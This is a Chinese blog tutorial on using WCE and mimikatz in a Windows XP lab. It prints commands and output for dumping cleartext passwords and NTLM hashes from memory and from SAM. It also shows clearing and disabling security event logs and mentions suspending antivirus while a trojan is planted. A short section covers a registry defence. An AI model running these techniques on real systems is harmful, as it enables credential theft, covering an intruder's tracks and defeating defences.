渗透测试之提权:利用相关工具提权

一、WINDOWS身份认证过程

  账户在登陆的目标服务器/系统后,系统中 WDisgest 安全包会在内存中维护当前处于登录状态账户明文的密码,当注销登陆后才会被删除。 

二、WCE (WINDOWS CREDENTIAL EDITOR

  Windows Credentials Editor (WCE)(windows凭证信息编辑器)是一款功能强大的windows平台内网渗透工具。

作用

  它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。可以查看系统当前登陆用户的登陆密码的密文形式和明文形式。

要求

  使用需具有管理员权限

安装

apt-get install wce
root@kali:/usr/share/windows-resources/wce# ls
getlsasrvaddr.exe README wce32.exe wce64.exe wce-universal.exe

help

C:\wce>wce-universal.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windowscache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

参数:

  -l :查看当前登录账号的密码的密文形式的哈希值【lmhash:nthash】

  -lv:表示查看更详细的信息【注入模式可能会对系统进程造成损坏】

  -r:每隔几秒去重新读下,看有没有新账户登录(默认5s)。

  -d:通过指定LUID删除某一会话。

  -g:计算指定密码的LM和NTLM哈希值。

  -w:读内存中 WDisgest 安全包维护的当前登录账户的明文密码。

注意:wce是从内存中读取,pwdump是从数据库SAM中读取的!

示例

  将wce整个文件夹拷到测试机(以xp_sp3为例),在xp上多建几个账号并通过切换用户使其分别处于登录状态。

参数 -l:

参数 -lv:

参数 -r:

 

登录 a 账户

参数 -d:

 

参数 -g:

 

参数 -w:

参数 -i + -s(修改指定会话的登录信息):

如:将 a 的登录会话修改成 administrator 账号

三、WCE攻击防御

  由于系统是通过 Digest Authentication Package 在内存中维护明文密码,默认自启动,为此可去注册表中关闭默认启动。

  注册表路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

Security Packages默认项:

  • kerberos
  • msv1_0
  • schannel
  • wdigest  本地内存维护明文密码
  • tspkg  远程终端维护……
  • pku2u

四、相似工具

1、pwdump 

  参见:https://www.cnblogs.com/z9m8r8/articles/15892054.html

2、fgdump

  Kali路径:/usr/share/windows-binaries/fgdump

XP演示:

3、mimikatz

  Kali 路径:/usr/share/windows-resources/mimikatz  

帮助信息(用双冒号查看命令模块和子模块)

C:\Documents and Settings\Administrator\Desktop\mimikatz\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # ::
ERROR mimikatz_doLocal ; "" module not found !

        standard  -  Standard module  [Basic commands (does not require module name)]
          crypto  -  Crypto Module
        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
        kerberos  -  Kerberos package module  []
       privilege  -  Privilege module
         process  -  Process module
         service  -  Service module
         lsadump  -  LsaDump module
              ts  -  Terminal Server module
           event  -  Event module
            misc  -  Miscellaneous module
           token  -  Token manipulation module
           vault  -  Windows Vault/Credential module
     minesweeper  -  MineSweeper module
             net  -
           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
       busylight  -  BusyLight Module
          sysenv  -  System Environment Value module
             sid  -  Security Identifiers module
             iis  -  IIS XML Config module
             rpc  -  RPC control of mimikatz
            sr98  -  RF module for SR98 device and T5577 target
             rdm  -  RF module for RDM(830 AL) device
             acr  -  ACR Module

privilege模块:提权

mimikatz # privilege::
ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found !

Module :        privilege
Full name :     Privilege module

           debug  -  Ask debug privilege
          driver  -  Ask load driver privilege
        security  -  Ask security privilege
             tcb  -  Ask tcb privilege
          backup  -  Ask backup privilege
         restore  -  Ask restore privilege
          sysenv  -  Ask system environment privilege
              id  -  Ask a privilege by its id
            name  -  Ask a privilege by its name

mimikatz # privilege::debug   #提权到debug
Privilege '20' OK

sekurlsa模块:查看登录账号密码信息等

mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 242726 (00000000:0003b426)
Session           : Interactive from 0
User Name         : Administrator
Domain            : DH-CA8822AB9589
Logon Server      : DH-CA8822AB9589
Logon Time        : 2/15/2022 9:14:59 AM
SID               : S-1-5-21-583907252-1757981266-1177238915-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * LM       : 44efce164ab921caaad3b435b51404ee
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        wdigest :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        kerberos :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/15/2022 9:08:41 AM
SID               : S-1-5-19
        msv :
…………………………

process模块:管理进程

mimikatz # process::
ERROR mimikatz_doLocal ; "(null)" command of "process" module not found !

Module :        process
Full name :     Process module

            list  -  List process
         exports  -  List exports
         imports  -  List imports
           start  -  Start a process
            stop  -  Terminate a process
         suspend  -  Suspend a process
          resume  -  Resume a process
             run  -  Run!
            runp  -
mimikatz # process::start cmd
Trying to start "cmd" : OK ! (PID 3888)

service模块:服务管理

mimikatz # service::
ERROR mimikatz_doLocal ; "(null)" command of "service" module not found !

Module :        service
Full name :     Service module

           start  -  Start service
          remove  -  Remove service
            stop  -  Stop service
         suspend  -  Suspend service
          resume  -  Resume service
     preshutdown  -  Preshutdown service
        shutdown  -  Shutdown service
            list  -  List services
               +  -  Install Me!
               -  -  Install Me!
              me  -  Me!

suspend子模块:挂起进程,可用于植入木马时,暂停防病毒软件。

resume子模块:进程恢复

lsadump模块 

mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

             sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password/ntlm for one user
      changentlm  -  Ask a server to set a new password/ntlm for one user
         netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
        packages

mimikatz # lsadump::sam    #从SAM数据库中读取账号密码
Domain : DH-CA8822AB9589
SysKey : 7be839f49edcab29c3a40fe24d47335f
ERROR kull_m_registry_OpenAndQueryWithAlloc ;kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ;kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

ts模块:终端服务,默认情况下XP只允许一个活动的登录会话

相当于打上一个补丁,使多个会话可以并行,即多用户登录。

event模块:日志管理

mimikatz # event::
ERROR mimikatz_doLocal ; "(null)" command of "event" module not found !

Module :        event
Full name :     Event module

            drop  -  [experimental] patch Events service to avoid new events
           clear  -  Clear an event log

mimikatz # event::clear
Using "Security" event log :
- 0 event(s)
- Cleared !
- 1 event(s)

mimikatz # event::drop

clear:清除已记录的安全日志等

drop:不在进行新的日志记录

misc模块:杂项

token模块

mimikatz # token::
ERROR mimikatz_doLocal ; "(null)" command of "token" module not found !

Module :        token
Full name :     Token manipulation module

          whoami  -  Display current identity
            list  -  List all tokens of the system
         elevate  -  Impersonate a token
             run  -  Run!
          revert  -  Revert to proces token

mimikatz # token::whoami
 * Process Token : {0;0002ed48} 0 - 333441      DH-CA8822AB9589\Administrator S-1-5-21-583907252-1757981266-1177238915-500    (08g,20p)       Primary
 * Thread Token  : no token

 

posted @ 2022-02-15 01:08  z9m8r8  阅读(837)  评论(0编辑  收藏  举报